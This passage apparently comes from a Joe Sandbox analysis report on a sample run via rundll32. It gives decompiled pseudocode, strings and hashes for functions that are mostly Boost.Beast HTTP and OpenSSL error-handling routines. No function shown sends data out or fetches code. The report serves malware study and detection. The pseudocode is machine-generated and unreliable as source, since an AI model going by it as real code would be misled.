                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::bea$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer
                                        • API String ID: 391329204-340118305
                                        • Opcode ID: 0ee7e3e791956c9b1287d491923b93dcd3cfdd896e556b7933079a29b0110e98
                                        • Instruction ID: 45a84a6f2e8564855e83fdf9d74bcc5056686965b699e4c4cd5229fae54d7805
                                        • Opcode Fuzzy Hash: 0ee7e3e791956c9b1287d491923b93dcd3cfdd896e556b7933079a29b0110e98
                                        • Instruction Fuzzy Hash: 52319E32205B8485EF51DB18E8883CA37E1F364718FA24226EEAD47BA5EB7DC557C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3013290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0000021E21EF3013290() {
				char _v32;
				char _v40;
				long long _v72;
				long long _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				long long _v144;
				signed int _t36;
				long long _t46;
				void* _t50;
				char* _t52;
				long long _t57;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t64;

				_t64 = _t62;
				 *((long long*)(_t64 - 0x38)) = 0xfffffffe;
				 *((long long*)(_t64 - 0x20)) = 0xf319d200;
				 *((long long*)(_t64 - 0x18)) = 0xf319d200;
				 *((long long*)(_t64 - 0x10)) = 0xf319d200;
				 *((long long*)(_t64 - 0x30)) = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t50, _t64 - 0x30, _t64 - 0x18, _t60, _t61);
				_v32 = 0xf319d240;
				r9d = 0xc2;
				_t57 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const";
				_t52 =  &_v32;
				E0000021E21EF3010190(0xf319d240, _t50, _t52, _t57, _t60);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v72 = _t57;
				_v144 = 0xfffffffe;
				if ( *((char*)(_t52 + 0x20)) != 6) goto 0xf3013356;
				_t46 = _t52 + 8;
				 *_t46 =  *_t46 + 2;
				if ( *_t46 != 0xf3204a36) goto 0xf30133b3;
				_t36 =  *(_t46 + 0x18) & 0x000000ff;
				if (_t36 == 0) goto 0xf3013350;
				if (_t36 != 1) goto 0xf301334c;
				_v72 = _t46;
				if ( *((char*)(_t46 + 0x10)) == 0) goto 0xf301334c;
				 *((char*)(_t46 + 0x10)) = 0;
				 *(_t46 + 0x18) = 0;
				 *(_t46 + 0x18) = 7;
				goto 0xf30133b3;
				_v120 = 0xf319d200;
				_v112 = 0xf319d200;
				_v104 = 0xf319d200;
				_v136 = "invalid iterator";
				_v128 = 1;
				E0000021E21EF310E0E4(_t50,  &_v136,  &_v112, _t60, _t61);
				_v120 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t50,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,6> &)", _t60);
			}





















                                        0x21ef3013290
                                        0x21ef3013297
                                        0x21ef30132a6
                                        0x21ef30132ac
                                        0x21ef30132b0
                                        0x21ef30132bb
                                        0x21ef30132bf
                                        0x21ef30132cc
                                        0x21ef30132d9
                                        0x21ef30132de
                                        0x21ef30132e4
                                        0x21ef30132eb
                                        0x21ef30132f0
                                        0x21ef30132f5
                                        0x21ef30132f6
                                        0x21ef30132f7
                                        0x21ef30132f8
                                        0x21ef30132f9
                                        0x21ef30132fa
                                        0x21ef30132fb
                                        0x21ef30132fc
                                        0x21ef30132fd
                                        0x21ef30132fe
                                        0x21ef30132ff
                                        0x21ef3013300
                                        0x21ef3013309
                                        0x21ef3013316
                                        0x21ef3013318
                                        0x21ef301331c
                                        0x21ef301332a
                                        0x21ef3013330
                                        0x21ef3013336
                                        0x21ef301333b
                                        0x21ef301333d
                                        0x21ef3013346
                                        0x21ef3013348
                                        0x21ef301334c
                                        0x21ef3013350
                                        0x21ef3013354
                                        0x21ef301335d
                                        0x21ef3013364
                                        0x21ef3013369
                                        0x21ef3013375
                                        0x21ef301337a
                                        0x21ef3013389
                                        0x21ef3013396
                                        0x21ef301339b
                                        0x21ef30133b7

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF30132B4, 0000021EF301336E
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,stru, xrefs: 0000021EF30132E4
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF30133A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,stru$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 391329204-3342265597
                                        • Opcode ID: 049dc1479e7db87711f72acbadcf86a6227ac42701e28c3f6069374f22c40323
                                        • Instruction ID: 95e3bfd69bbbbf35b6df5147cb01ea301a1e1b5bc19a5fde7021c5061dcdd11a
                                        • Opcode Fuzzy Hash: 049dc1479e7db87711f72acbadcf86a6227ac42701e28c3f6069374f22c40323
                                        • Instruction Fuzzy Hash: 4931AF32219F4095EF50DB14E88838A37F1F3A4364F960226EEAD43BA5EB7CC556C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30137E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 35%
                                        			E0000021E21EF30137E0() {
				char _v32;
				char _v40;
				long long _v72;
				long long _v104;
				char _v112;
				char _v120;
				char _v128;
				char _v136;
				long long _v144;
				signed int _t36;
				long long _t46;
				void* _t50;
				char* _t52;
				long long _t57;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t64;

				_t64 = _t62;
				 *((long long*)(_t64 - 0x38)) = 0xfffffffe;
				 *((long long*)(_t64 - 0x20)) = 0xf319d200;
				 *((long long*)(_t64 - 0x18)) = 0xf319d200;
				 *((long long*)(_t64 - 0x10)) = 0xf319d200;
				 *((long long*)(_t64 - 0x30)) = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t50, _t64 - 0x30, _t64 - 0x18, _t60, _t61);
				_v32 = 0xf319d240;
				r9d = 0xc2;
				_t57 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,8> &) const";
				_t52 =  &_v32;
				E0000021E21EF3010190(0xf319d240, _t50, _t52, _t57, _t60);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v72 = _t57;
				_v144 = 0xfffffffe;
				if ( *((char*)(_t52 + 0x20)) != 9) goto 0xf30138a6;
				_t46 = _t52 + 8;
				 *_t46 =  *_t46 + 2;
				if ( *_t46 != 0xf3204a36) goto 0xf3013903;
				_t36 =  *(_t46 + 0x18) & 0x000000ff;
				if (_t36 == 0) goto 0xf30138a0;
				if (_t36 != 1) goto 0xf301389c;
				_v72 = _t46;
				if ( *((char*)(_t46 + 0x10)) == 0) goto 0xf301389c;
				 *((char*)(_t46 + 0x10)) = 0;
				 *(_t46 + 0x18) = 0;
				 *(_t46 + 0x18) = 0xa;
				goto 0xf3013903;
				_v120 = 0xf319d200;
				_v112 = 0xf319d200;
				_v104 = 0xf319d200;
				_v136 = "invalid iterator";
				_v128 = 1;
				E0000021E21EF310E0E4(_t50,  &_v136,  &_v112, _t60, _t61);
				_v120 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t50,  &_v120, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,9> &)", _t60);
			}





















                                        0x21ef30137e0
                                        0x21ef30137e7
                                        0x21ef30137f6
                                        0x21ef30137fc
                                        0x21ef3013800
                                        0x21ef301380b
                                        0x21ef301380f
                                        0x21ef301381c
                                        0x21ef3013829
                                        0x21ef301382e
                                        0x21ef3013834
                                        0x21ef301383b
                                        0x21ef3013840
                                        0x21ef3013845
                                        0x21ef3013846
                                        0x21ef3013847
                                        0x21ef3013848
                                        0x21ef3013849
                                        0x21ef301384a
                                        0x21ef301384b
                                        0x21ef301384c
                                        0x21ef301384d
                                        0x21ef301384e
                                        0x21ef301384f
                                        0x21ef3013850
                                        0x21ef3013859
                                        0x21ef3013866
                                        0x21ef3013868
                                        0x21ef301386c
                                        0x21ef301387a
                                        0x21ef3013880
                                        0x21ef3013886
                                        0x21ef301388b
                                        0x21ef301388d
                                        0x21ef3013896
                                        0x21ef3013898
                                        0x21ef301389c
                                        0x21ef30138a0
                                        0x21ef30138a4
                                        0x21ef30138ad
                                        0x21ef30138b4
                                        0x21ef30138b9
                                        0x21ef30138c5
                                        0x21ef30138ca
                                        0x21ef30138d9
                                        0x21ef30138e6
                                        0x21ef30138eb
                                        0x21ef3013907

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF3013804, 0000021EF30138BE
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,clas, xrefs: 0000021EF3013834
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF30138F1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy$ExceptionThrow
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,clas$invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 391329204-654534564
                                        • Opcode ID: 06b47b149ba674be803b27fcd790675cea3982de6692d6c533135f3f13808246
                                        • Instruction ID: daa48b3371a6d360e79a83f978e531648407899098ec7335f9cdd3aa81c3f305
                                        • Opcode Fuzzy Hash: 06b47b149ba674be803b27fcd790675cea3982de6692d6c533135f3f13808246
                                        • Instruction Fuzzy Hash: C1317032215F8095EF50DB14E88838A3BF5F3A5354F920226EEAD47BA5EB7CC556C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF9E70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E0000021E21EF2FF9E70(void* __rcx) {
				char _v80;
				char _v144;
				char _v232;
				long long _v240;
				long long _v248;
				char _v256;
				char _v264;
				char _v272;
				char _v280;
				void* __rbx;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t42;
				long long _t49;
				void* _t54;
				char* _t62;
				void* _t74;
				void* _t75;

				_v240 = 0xfffffffe;
				_t54 = __rcx;
				_t49 =  *((intOrPtr*)(__rcx + 0x70));
				_v280 = 1;
				_v272 = _t49;
				_t39 =  *((intOrPtr*)(__rcx + 0x5c));
				if (_t39 != 8) goto 0xf2ff9f59;
				if (_t49 == 0) goto 0xf2ff9f5e;
				_v264 = 0xf319d200;
				_v256 = 0xf319d200;
				_v248 = 0xf319d200;
				_v280 = "invalid request body";
				_v272 = 1;
				E0000021E21EF310E0E4(__rcx,  &_v280,  &_v256, _t74, _t75);
				_v264 = 0xf319d240;
				_v264 = 0xf319d258;
				E0000021E21EF30013E0(__rcx,  &_v144,  &_v264);
				 *0x21EF319D280 = "void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_constant<bool,1>)";
				 *0x21EF319D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
				 *0x21EF319D290 = 0x172;
				E0000021E21EF3003440(0xf319d258,  &_v80);
				E0000021E21EF3003480(_t38, __rcx,  &_v232, 0xf319d258, _t75);
				_t62 =  &_v232;
				E0000021E21EF31103EC(__rcx, _t62, 0xf31e4690, _t75);
				if (0xf319d258 != 0) goto 0xf2ff9f8b;
				if ((_t62 - 0x00000004 & 0xfffffffc) != 0) goto 0xf2ff9f6d;
				if (_t39 != 6) goto 0xf2ff9f8b;
				0xf3000b00();
				_v280 = 0;
				E0000021E21EF3001170(_t38, _t42, 0xf319d258, _t54, _t54,  &_v280, _t75);
				goto 0xf2ff9fa2;
				_t37 = E0000021E21EF3001170(_t38, _t42, 0xf319d258, _t54, _t54,  &_v280, _t75);
				0xf3000b00();
				return _t37;
			}






















                                        0x21ef2ff9e79
                                        0x21ef2ff9e82
                                        0x21ef2ff9e85
                                        0x21ef2ff9e89
                                        0x21ef2ff9e8e
                                        0x21ef2ff9e93
                                        0x21ef2ff9e99
                                        0x21ef2ff9ea2
                                        0x21ef2ff9eaf
                                        0x21ef2ff9eb6
                                        0x21ef2ff9ebb
                                        0x21ef2ff9ec7
                                        0x21ef2ff9ecc
                                        0x21ef2ff9edb
                                        0x21ef2ff9ee8
                                        0x21ef2ff9ef4
                                        0x21ef2ff9f06
                                        0x21ef2ff9f13
                                        0x21ef2ff9f1e
                                        0x21ef2ff9f22
                                        0x21ef2ff9f34
                                        0x21ef2ff9f42
                                        0x21ef2ff9f4e
                                        0x21ef2ff9f53
                                        0x21ef2ff9f5c
                                        0x21ef2ff9f66
                                        0x21ef2ff9f6b
                                        0x21ef2ff9f72
                                        0x21ef2ff9f77
                                        0x21ef2ff9f84
                                        0x21ef2ff9f89
                                        0x21ef2ff9f93
                                        0x21ef2ff9f9d
                                        0x21ef2ff9faa

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 0000021EF2FF9F17
                                        • void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_, xrefs: 0000021EF2FF9F0C
                                        • invalid request body, xrefs: 0000021EF2FF9EC0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid request body$void __cdecl boost::beast::http::message<1,struct boost::beast::http::basic_string_body<char,struct std::char_traits<char>,class std::allocator<char> >,class boost::beast::http::basic_fields<class std::allocator<char> > >::prepare_payload(struct std::integral_
                                        • API String ID: 3608347590-2849356305
                                        • Opcode ID: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction ID: bdd62983b66ba000e72901121e71755a1066b0601e23b7edf12ecb5dbc54fc9e
                                        • Opcode Fuzzy Hash: 15a5388d6bc62080ccf0706142a58d9206a5d28c7ffa795efbdde216f47d1515
                                        • Instruction Fuzzy Hash: 3E316B72225B4091EE60DB14EC843DAB3A5F7E9354F421226EE9E42BE9EF3CC146C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF9550 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FF9550() {
				long long _v240;
				void* _t6;

				_v240 = 0xfffffffe;
				if (_t6 - 0x21 > 0) goto 0xf2ff97e8;
				goto __rdx;
			}





                                        0x21ef2ff9557
                                        0x21ef2ff9563
                                        0x21ef2ff957e

                                        APIs
                                        Strings
                                        • unknown verb, xrefs: 0000021EF2FF9800
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/verb.ipp, xrefs: 0000021EF2FF9857
                                        • class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::detail::verb_to_string<void>(enum boost::beast::http::verb), xrefs: 0000021EF2FF984C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/verb.ipp$class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::detail::verb_to_string<void>(enum boost::beast::http::verb)$unknown verb
                                        • API String ID: 1552479455-1288829158
                                        • Opcode ID: 57095a948f91b45fc15dc5d14dab256eb02e633188c9eac2244ef9de57736c09
                                        • Instruction ID: 704d90b367a0ef97889a884556288308acdb8682d2771db00a4cbf1810cbca78
                                        • Opcode Fuzzy Hash: 57095a948f91b45fc15dc5d14dab256eb02e633188c9eac2244ef9de57736c09
                                        • Instruction Fuzzy Hash: 3F216D72205B4092DE519B00E8843CBB3B5F799354F814226EE9D43BA9EF7CC65AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3007010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 49%
                                        			E0000021E21EF3007010(void* __ebx, intOrPtr __edx, void* __rbx, void* __rsi) {
				char _v80;
				char _v144;
				char _v232;
				long long _v240;
				char _v248;
				char _v256;
				long long _v264;
				char _v272;
				char _v280;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				char* _t41;
				void* _t47;

				_t48 = __rsi;
				_t34 = __rbx;
				_t27 = __edx;
				_t26 = __ebx;
				_v240 = 0xfffffffe;
				if (__edx - 0x3e7 <= 0) goto 0xf30070dd;
				_v280 = 0xf319d200;
				_v272 = 0xf319d200;
				_v264 = 0xf319d200;
				_v256 = "invalid status-code";
				_v248 = 1;
				E0000021E21EF310E0E4(__rbx,  &_v256,  &_v272, _t47, __rsi);
				_v280 = 0xf319d240;
				_v280 = 0xf319d258;
				E0000021E21EF30013E0(_t34,  &_v144,  &_v280);
				 *0x21EF319D280 = "void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)";
				 *0x21EF319D288 = "D:\\Sources\\boost_1_68_0\\boost/beast/http/impl/message.ipp";
				 *0x21EF319D290 = 0x92;
				E0000021E21EF3003440(0xf319d258,  &_v80);
				E0000021E21EF3003480(_t26, _t34,  &_v232, 0xf319d258, _t48);
				_t41 =  &_v232;
				_t25 = E0000021E21EF31103EC(_t34, _t41, 0xf31e4690, _t48);
				 *((intOrPtr*)(_t41 + 0x5c)) = _t27;
				return _t25;
			}

















                                        0x21ef3007010
                                        0x21ef3007010
                                        0x21ef3007010
                                        0x21ef3007010
                                        0x21ef3007017
                                        0x21ef3007026
                                        0x21ef3007033
                                        0x21ef300703a
                                        0x21ef300703f
                                        0x21ef300704b
                                        0x21ef3007050
                                        0x21ef300705f
                                        0x21ef300706c
                                        0x21ef3007078
                                        0x21ef300708a
                                        0x21ef3007097
                                        0x21ef30070a2
                                        0x21ef30070a6
                                        0x21ef30070b8
                                        0x21ef30070c6
                                        0x21ef30070d2
                                        0x21ef30070d7
                                        0x21ef30070dd
                                        0x21ef30070e7

                                        APIs
                                        Strings
                                        • D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp, xrefs: 0000021EF300709B
                                        • void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int), xrefs: 0000021EF3007090
                                        • invalid status-code, xrefs: 0000021EF3007044
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/http/impl/message.ipp$invalid status-code$void __cdecl boost::beast::http::header<0,class boost::beast::http::basic_fields<class std::allocator<char> > >::result(unsigned int)
                                        • API String ID: 3608347590-395387356
                                        • Opcode ID: 50cda2e0f1280f95b61c1fdc4194b777afc7643b2209b709a0bfa74a048f2156
                                        • Instruction ID: c2667ac5e0cbeb7397a10f4414df4671da6bc59bbb7eb031027ef76faa799877
                                        • Opcode Fuzzy Hash: 50cda2e0f1280f95b61c1fdc4194b777afc7643b2209b709a0bfa74a048f2156
                                        • Instruction Fuzzy Hash: 4F110B72215B4095DA619B10E8843CF73B5F7E4354F815326AE9D43BA5EF7CC65AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3021840 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 122stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E0000021E21EF3021840(unsigned int __ecx, void* __rax, intOrPtr* __rdx, void* __r8, long long __r12, long long __r13, long long __r14, long long __r15) {
				void* __rbx;
				char* _t39;
				void* _t67;
				signed long long _t70;
				signed long long _t71;
				void* _t74;
				void* _t76;
				void* _t77;
				intOrPtr* _t88;
				void* _t96;
				void* _t99;
				intOrPtr* _t100;
				long long _t103;
				void* _t106;
				signed long long _t107;
				void* _t114;
				signed long long _t118;
				signed long long _t121;
				void* _t123;
				signed long long _t126;

				_t92 = __rdx;
				if (__r8 == 0) goto 0xf3021a38;
				E0000021E21EF310C220();
				_t107 = _t106 - __rax;
				_t70 =  *0xf3203000; // 0x1fc8e4a4378e
				_t71 = _t70 ^ _t107;
				 *(_t107 + 0x100) = _t71;
				 *((long long*)(_t107 + 0x168)) = _t103;
				_t77 = __r8;
				 *((long long*)(_t107 + 0x128)) = __r12;
				 *((long long*)(_t107 + 0x120)) = __r13;
				r12d = __ecx;
				_t100 = __rdx;
				 *((long long*)(_t107 + 0x118)) = __r14;
				 *((long long*)(_t107 + 0x110)) = __r15;
				r12d = r12d & 0x00000fff;
				E0000021E21EF3021E10(__ecx, _t71, __r8, _t96);
				_t118 = _t71;
				E0000021E21EF3021A40(__ecx, _t71, __r8, _t99);
				_t126 = _t71;
				E0000021E21EF30223F0(__ecx, _t71, __r8, _t76);
				_t121 = _t71;
				if (_t118 != 0) goto 0xf30218f0;
				r9d = __ecx;
				r9d = r9d >> 0x18;
				E0000021E21EF3026420(_t71, _t107 + 0xc0, _t92, "lib(%lu)", _t114);
				if (_t126 != 0) goto 0xf3021910;
				r9d = __ecx >> 0x0000000c & 0x00000fff;
				E0000021E21EF3026420(_t71, _t107 + 0x80, _t92, "func(%lu)", _t114);
				if (_t121 != 0) goto 0xf302192d;
				r9d = r12d;
				E0000021E21EF3026420(_t71, _t107 + 0x40, _t92, "reason(%lu)", _t114);
				r9d = __ecx;
				_t94 =  !=  ? _t121 : _t107 + 0x40;
				 *((long long*)(_t107 + 0x30)) =  !=  ? _t121 : _t107 + 0x40;
				_t85 =  !=  ? _t126 : _t107 + 0x80;
				 *((long long*)(_t107 + 0x28)) =  !=  ? _t126 : _t107 + 0x80;
				_t73 =  !=  ? _t118 : _t107 + 0xc0;
				 *((long long*)(_t107 + 0x20)) =  !=  ? _t118 : _t107 + 0xc0;
				E0000021E21EF3026420( !=  ? _t118 : _t107 + 0xc0, _t100, _t77, "error:%08lX:%s:%s:%s", _t114);
				if ( *_t100 == 0) goto 0xf30219b1;
				if (0 - 0x80000000 >= 0) goto 0xf30219b1;
				_t88 = _t100 + 1;
				if ( *_t88 != dil) goto 0xf30219a0;
				_t74 = _t77 - 1;
				asm("btr ecx, 0x1f");
				if (_t88 != _t74) goto 0xf3021a0e;
				if (_t77 - 4 <= 0) goto 0xf3021a0e;
				_t123 = _t77 - 5 + _t100;
				asm("o16 nop [eax+eax]");
				_t39 = strchr(??, ??);
				if (_t74 == 0) goto 0xf30219f7;
				_t67 = _t74 - _t123;
				if (_t67 <= 0) goto 0xf30219fe;
				 *((char*)(_t123 + _t96)) = 0x3a;
				if (_t67 != 0) goto 0xf30219e0;
				E0000021E21EF310C290();
				return _t39;
			}























                                        0x21ef3021840
                                        0x21ef3021843
                                        0x21ef3021851
                                        0x21ef3021856
                                        0x21ef3021859
                                        0x21ef3021860
                                        0x21ef3021863
                                        0x21ef302186b
                                        0x21ef3021873
                                        0x21ef3021876
                                        0x21ef3021880
                                        0x21ef3021888
                                        0x21ef302188e
                                        0x21ef3021891
                                        0x21ef30218a1
                                        0x21ef30218a9
                                        0x21ef30218b0
                                        0x21ef30218b7
                                        0x21ef30218ba
                                        0x21ef30218c1
                                        0x21ef30218c4
                                        0x21ef30218c9
                                        0x21ef30218cf
                                        0x21ef30218d1
                                        0x21ef30218db
                                        0x21ef30218eb
                                        0x21ef30218f3
                                        0x21ef30218f5
                                        0x21ef302190b
                                        0x21ef3021913
                                        0x21ef3021915
                                        0x21ef3021928
                                        0x21ef302193d
                                        0x21ef3021940
                                        0x21ef302194c
                                        0x21ef302195e
                                        0x21ef3021965
                                        0x21ef302196d
                                        0x21ef3021971
                                        0x21ef3021976
                                        0x21ef302199c
                                        0x21ef30219a5
                                        0x21ef30219a7
                                        0x21ef30219af
                                        0x21ef30219b3
                                        0x21ef30219b7
                                        0x21ef30219be
                                        0x21ef30219c4
                                        0x21ef30219cf
                                        0x21ef30219d5
                                        0x21ef30219e8
                                        0x21ef30219f0
                                        0x21ef30219f2
                                        0x21ef30219f5
                                        0x21ef30219fb
                                        0x21ef3021a0c
                                        0x21ef3021a29
                                        0x21ef3021a38

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: strchr
                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                        • API String ID: 2830005266-2416195885
